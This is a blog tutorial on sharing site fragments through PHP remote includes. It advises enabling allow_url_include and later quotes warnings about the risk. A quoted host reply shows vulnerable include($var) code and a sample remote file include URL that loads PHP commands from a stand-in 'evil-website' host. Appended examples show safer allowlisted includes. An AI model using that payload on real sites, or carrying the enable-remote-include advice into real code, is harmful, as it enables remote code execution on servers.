Want to Build Websites the SMART Way – Use This Golden Tip!

This article is a bit geeky (naturally), but I have tried my best to make it as easy for you as possible. Even then, if you have any questions, feel free to contact me :)

1. The Story

First, enjoy the story. This is not a Pulitzer-prize winning story by the way so don’t expect anything extraordinary out of it. ;)

A guy called Tom was good at building plain html websites. He used to build his site the old fashioned way, with a standard HTML editor. The biggest drawback of his site was that he couldn't change even a minor part of his website without editing the entire site!

Anyway, for this Tom guy, the first few years went well, until his business began to progress and he realized that he needed to update some of the old information displayed on his website.

Now, since he made the site the 'old-fashioned' way, he had to download the entire website even though he needed to change only a couple of little things here and there!

So Tom wasted hours upon hours doing a lot of unnecessary work. He could have reduced his workload by at least half IF he had been smart enough to use PHP includes on his websites!

If he had used PHP includes, he could easily change any part of his website without having to edit the whole thing (which is no doubt a lot more time consuming).

If you are not building your sites using  PHP includes, YOU could be the next Tom ;)

With PHP includes, you can have separate files, each for Adsense block, eBay block, links menu, and of course, header and footer. Your site won’t look any different than a static html website! Neither your visitors nor the mighty Google would be able to know that you are using PHP includes in your site. And the benefit?

If you want to change your Adsense block, you simply open the Adsense file in your favorite HTML editor, make the necessary changes and upload the file back to your server. Your changes would be instantly reflected on the ENTIRE website!

Same could be said for header or footer. Maybe you want to use a different header image, or change the color of the header? You can easily do that by changing ONLY the header file; you don’t need to change the entire website.

Okay, I hope that by now one thing is clear to you: PHP includes can be a HUGE time saver for any webmaster!

If you already know a bit about PHP includes, continue reading. However, if you are new to it, I highly recommend you buy this PHP Guide (comes with resell and plr rights).

It is mainly beginner stuff, and a bit old too, but I would be forever grateful to this little ebook. For me, it was more valuable than several other 'make-money' ebooks I have purchased. Why? For the first time, with the help of this ebook, I learnt the art of building my sites the 'smart' way!  :)

Let me give you an example of how much I benefited from this short report.

There was a time when eBay used to accept only US affiliates. Finding no other option, I had to use Amazon.com for the purpose of promoting merchandise. I was happy with neither my conversions nor the revenue, but what the hell could I do?

Fortunately, several months later, the GOOD news came: eBay started accepting international affiliates, including Indians! I quickly jumped and signed up! Now was the time to replace all my Amazon ad codes with eBay ad codes.

Back then I had the habit of using the header file as a container for the ads (I agree the header is not the right place for the ads, but back then I was a complete newbie as far as PHP is concerned). Anyway, changing the ad codes for the entire site was simply a matter of changing the header file!

With the old technique you would learn about in the above-mentioned PHP guide, you would still have to work a bit! Let's say that you have 3 websites:

http://www.xxx1.com/

http://www.xxx2.com/

http://www.xxx3.com/

Now, let’s say that you need to change the Adsense codes of each of these websites, and let’s further assume that the ad code is in the header file of each site. So, naturally you would have to edit the header of EACH site (which means a total of three headers).

This is the old way of doing things. The new age webmasters do things in a different way: they put the editable header on only ONE website, and include that header file through a remote link on the other sites. With this method, you need to edit only ONE header file (instead of three) in order to reflect your changes on all the three websites.

For example, you could have your editable header at http://www.xxx1.com/. With the help of PHP includes, you could call that remote header to be included in your other websites, viz.,  http://www.xxx2.com/ and http://www.xxx3.com/

I hope I am clear up to this point. Let's dig deeper into it!

2. Benefits of the Advanced Technique

There are several benefits of this technique:

1. You could have your ad file on a remote server, and you can include that ad on all of your other websites. Thus, if you ever need to change the ad, you simply make ONE tweak in the remote server's ad file and the changes would be reflected on all of your other websites which call that ad file!

2. Or, you could have a footer file (with links menu) on a remote website, and you could include that file into all of your other websites. Thus, if you ever need to change the footer of all of your websites, you need to change only the footer of the remote site.

For this method to work, all the footers must of course share a common theme. If one site's footer is different from the other then it won’t work.

With this method, you are not limited to just ads or headers/footers. You can call inline optin forms from a remote website and include them on another site.

With the help of PHP includes, you can include ANY type of code into your webpage: be it PLAIN html code, or PHP or JavaScript.

For instance, if you want to include copyright information into your webpage, you can include either the following Javascript code into the footer of the site:

<script language = 'JavaScript' type="text/javascript">
<!--
function y2k(number) { return (number < 1000) ? number + 1900 : number; }
var today = new Date();
var year = y2k(today.getYear());
document.write('&copy; '+year+' by Verge Soft Inc. All Rights Reserved Worldwide');
//-->
</script>

OR use the following PHP code:

Copyright 2001 – <?=date("Y");?>. All rights reserved.

Think of it as an artificial Christmas tree: the index.php is the base of the tree and the other files are its branches. You simply plug the branches in the right positions and your tree is setup! :D

3. The Steps:

Note: I highly recommend that you use either Dreamweaver or PSPad Editor for these steps. :)

Step1: Ask your webhost to switch on allow_url_fopen (if it is not already switched on; most hosts have it switched on by default) for your account

Step2. Now is the time to switch on the allow_url_include. This is something you need to do yourself!

Download PSPAD if you haven’t already (it's free)! Open a new, blank file, and include only this code in that file:

 allow_url_include = on

Save it as a php.ini file. Upload this file to the SAME directory where all the other files of your site are located. You would need to upload this file to each and every directory from where you want to call remote files using the PHP includes function.

You can download a sample php.ini file here

Step3: Edit your .htaccess file

I recommend you use a free editor like PSPAD for this purpose.

Open the .htaccess file, then add the following lines of code into it (at the very END of the contents of the .htaccess file):

If your server is on PHP4, then you can add either of the following directives:

AddType application/x-httpd-php .php .html .htm

OR

AddHandler application/x-httpd-php .php .html .htm

If your server is on PHP5 (my server is), then you should use the following directives instead:

AddType application/x-httpd-php5 .php .html .htm

OR

AddHandler application/x-httpd-php5 .php .html .htm

If none of the above directives work for you, then you should contact your host and get the required information from them!

If you are not sure which PHP version your server is using, just download this file, unzip it, upload the file to your server's root directory, and run it through your browser. At the very top you will find the php version of your server!

The .htaccess file is usually located at the root directory of your domain; if it is an addon domain, then you might need to create the .htaccess file MANUALLY. Simply use PSPAD as before, create a blank file, include any one of the above directives, and save it as .htaccess

Hey, what are you waiting for? Now upload the .htaccess file to your server!

Thankfully our 'ordeal' is soon going to be over ;)

Step4: Now is the time to do the fun part of the work: that is, calling the remote file using PHP includes function. I have figured it would be better to actually create some sample files for you instead of confusing you with all the coding right here (as a matter of fact, my list consists mostly of internet marketers rather than programmers ;) )

Sample1: In this sample I am using a regular PHP file in which I have called a remote HTML file using PHP includes! In this file you will see a code like:

<?php include("http://www.flexiblewriter.com/weightloss-myths-mrr.html"); ?>

Click here to download this file.

Sample2: In this sample I am using an empty PHP file in which I have called the same URL using PHP includes!

Click here to download this file.

Sample3: In this sample I am using an empty HTML file in which I have called the same URL using PHP includes!

Click here to download this file.

Sample4: In this sample I am using an empty PHP file in which I have called a different URL (with .php extension), again using PHP includes! In this file you will see a code like:

<?php include("http://www.flexiblewriter.com/contact.php"); ?>

Click here to download this file.

So, in conclusion, if you are new to PHP includes, I highly recommend you get this short php template guide

Add to that what you have learnt in this article and you will soon become an expert 'PHP' webmaster. :D

Oh, and if there is any 'Tom' in your locality, don’t forget to direct him to this article (just kidding) ;)

IMPORTANT: Security Risks Associated with Remote File Includes!

PHP has always been criticized for being a 'weak' programming language, and one of the worst criticisms it has faced concerns the security vulnerability caused by the use of remote file includes. In this context, you might want to read this article!

I had almost finished writing this article when I was suddenly reminded of my friend Hope Renee. To make sure that there is no mistake in this article, I asked her to review it. She is herself a PHP programmer and deserves a linkback for the help she offered me regarding this article.

If it were not for her, I wouldn’t have even thought about including the security part in this article. Thanks Hope :D

DO NOT forget to read till the end of this article to find a 'happy ending' ;)

She pointed out to me that:

"The part of the article I disagree with is suggesting use of allow_url_fopen and allow_url_include. There are security vulnerabilities regarding the use of remote file includes. All you need do is Google those settings adding the word "security" to your search phrase to find out more.

There IS however a simple way to still allow php includes to be shared by multiple websites (assuming they are all hosted on the same server)…. simply place your php includes files in a directory ABOVE the web accessible root directory (e.g. Above DOCUMENT ROOT) and include them by path.

Let's say you have multiple sites all hosted on a server and their file paths might be something like

/home/domain1/public_html/ ,
/home/domain2/public_html/ ,

etc…

Then you could create a sub-directory at the /home/ level, let's call it "my_includes"… put your php include files there…. and include them from scripts on your multiple domains in the form of:

include '/home/my_includes/whatever.php'; "

Sorry Hope, I tried your suggestion but it didn’t work. :(  The reason (as I learned later from my host) is that my server has a security restriction called open_basedir. If this restriction were not in place, all webmasters would be able to view each other's files by including them in their webpages, which in turn would pose a lot of security issues.

I tried it on another server but I kept getting the same errors.

Hope's suggestion however would work fine if the two domains in question are on the same account. For example, if your website is an addon domain of another domain, then you could call any file from the root directory into that addon domain using local path commands.

Aside from the instructions I gave above, there is another way you can use to achieve the same thing. Read this article!

Again, for this to work, all the domains must be under the SAME account!

For domains which are on same server but different accounts (as was my case), you would need to use remote file paths, such as http://www.domain.com/xxxx.html or http://www.domain.com/xxxx.php 

However, I didn’t end the topic just there. I asked my webhost (there are some very intelligent support staff there, lol): "Is there any security issue associated with allow_url_include turned on?"

Their answer:

"Yes and no.

By default, having it enabled is not a security risk. However, there are zillions of amateur PHP developers who do not understand the security implications of that setting, and if they write bad code, then it's possible that the setting could be abused.

If you want to see a bunch of code that was written poorly that pertains to allow_url_include, go here: http://milw0rm.com/search.php

and type this into the search box: remote file include

You will see a lot of examples of bad PHP code which has things like this:

include($index);

and this:

require "{$news_cfg['path']}/german.inc.php";

and this:

include($config_file);

and this:

include($include_path."settings.php");

etc.

Using the first example: include($index);

*if* the $index variable is not properly handled, a remote attacker can do something like this: http://example.com/script.php?index=http://evil-website/file-with-PHP-commands.txt?command=commands-go-here

Notice how the index variable is being set to http://evil-website/file-with-PHP-commands.txt?command=commands-go-here

Good PHP practices will not allow that, as good PHP code would restrict the usage of the index variable.

Your best bet is to ask the vendor of the code you are using if they fully understand and take steps to protect against remote file include attacks, and local file include attacks. If they can't answer those questions, I would not personally trust their code."
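Added example, not code from the original article or from the host's reply: one way to restrict the $index value in the include($index) case above, while keeping the shared files in a directory outside the document root as in Hope's suggestion. The function name, the fragment names and the temporary directory standing in for /home/my_includes are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Shared fragments live outside the document root, e.g. /home/my_includes.
// For this demo a constructed temp directory stands in for it (assumption).
$sharedDir = sys_get_temp_dir() . '/my_includes_demo';
@mkdir($sharedDir);
file_put_contents("$sharedDir/header.php", "<div>header</div>\n");
file_put_contents("$sharedDir/footer.php", "<div>footer &copy; <?= date('Y') ?></div>\n");

/**
 * Map a visitor-supplied key to a file path. The visitor only ever picks
 * a key; the path comes from this fixed table, never from the request.
 */
function resolve_fragment(string $key, string $sharedDir): ?string
{
    static $allowed = ['header' => 'header.php', 'footer' => 'footer.php'];
    if (!isset($allowed[$key])) {
        return null; // URLs, relative paths and unknown keys all end here
    }
    $base = realpath($sharedDir);
    $path = realpath($sharedDir . '/' . $allowed[$key]);
    // Defence in depth: the resolved file must sit inside the shared
    // directory (catches a symlink put in place of an allowlisted file).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: two legitimate keys, plus the kind of values that
// include($index) would have handed straight to the include statement.
$inputs = [
    'header',
    'footer',
    'http://evil-website/file-with-PHP-commands.txt',
    '../other-account/settings.php',
];
foreach ($inputs as $index) {
    $file = resolve_fragment($index, $sharedDir);
    if ($file === null) {
        echo "rejected: $index\n";
        continue;
    }
    include $file;
}
```

Because the include target is always a local path taken from the table, this pattern works with allow_url_include switched off.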

I said: "Well, there is no question of php script here. I am just trying to call a remote html file into another, so I guess I am safe. :)

Still, I want to be sure that if I use this setting only for calling ordinary html files from remote servers, and assuming that there is no PHP script involved in here, is there still a way a hacker could exploit it?

For example, let's say that I want to include:

http://xxxxxx.com/footer.html

into this file:

http://yyyyyy.com/index.php "

They said that as long as I'm carefully controlling what files can be included, (which cannot be influenced by a website visitor), then it should be ok.
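Added example, not from the original article: for the plain-HTML case described above, the remote fragment can be read as a string and echoed instead of being passed to include, which needs only allow_url_fopen and never runs PHP code found in the response. The function name, cache path and stubbed response are assumptions; the URL is the placeholder used above.

```php
<?php
declare(strict_types=1);

/**
 * Return the fragment at $url, cached in $cacheFile for $ttl seconds.
 * The body is only ever handled as a string, so PHP tags inside it are
 * never executed on this server (unlike include of the same URL).
 */
function remote_fragment(string $url, string $cacheFile, int $ttl, ?callable $fetch = null): string
{
    if (is_file($cacheFile) && time() - filemtime($cacheFile) < $ttl) {
        return (string) file_get_contents($cacheFile);
    }
    // Default fetcher: plain HTTP GET with a short timeout. Needs
    // allow_url_fopen only; allow_url_include can stay off.
    $fetch ??= static function (string $u) {
        $ctx = stream_context_create(['http' => ['timeout' => 3]]);
        return @file_get_contents($u, false, $ctx);
    };
    $body = $fetch($url);
    if (is_string($body) && $body !== '') {
        file_put_contents($cacheFile, $body, LOCK_EX);
        return $body;
    }
    // Remote site down: serve the stale copy rather than break the page.
    return is_file($cacheFile) ? (string) file_get_contents($cacheFile) : '';
}

// Demo with a constructed response instead of a network call. The URL is
// fixed in code, never taken from the request.
$fake = static fn (string $u): string =>
    "<p>Footer links</p><?php echo 'injected'; ?>\n";
$cache = sys_get_temp_dir() . '/footer_fragment_demo.html';
@unlink($cache);

$html = remote_fragment('http://xxxxxx.com/footer.html', $cache, 300, $fake);
// Printed escaped here so the inert PHP tag is visible; a page would echo $html.
echo htmlspecialchars($html, ENT_QUOTES, 'UTF-8'), "\n";
```

The fetched markup still reaches the visitor's browser unchanged, scripts included, so the URL should stay fixed in code and point to a site you control.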

And here are two final tips:

When it comes to php scripts, especially if they are custom coded for you, I think it is best to have it reviewed by a couple of other programmers. I have a friend who purchased an article directory software for almost $300 and even took their help to do some customizations on the software.

For years there was no issue, then one day, suddenly, out of the blue he told me that his site was hacked! The developers were not intelligent enough to be able to fix the security holes in the script, lol and it was not even updated regularly!

He told me that he had learnt his lesson and would make sure to have each and every script reviewed by a few other programmers before using them!

Yes, most of us, including me, don’t and cannot abide by that rule, because it is easier said than done. I personally buy scripts only from reputed, long-time, and trustworthy vendors; same goes for programmers too ;)

It is equally important to choose a host like Myriadnetworks where you can find intelligent support staff who know how to take care of their servers properly.

I am really glad for all the frequent updates they do for security reasons. They were one of the first hosts to upgrade their servers to PHP5 because PHP4 was nearing EOL (End of Life); Hostgator did the same thing much later. :)

Let me end the article by saying that PHP includes has been a huge time saver for me, and I am not going to stop its use, no matter what others say ;)

What about you?

As always, your comments are welcome! :)
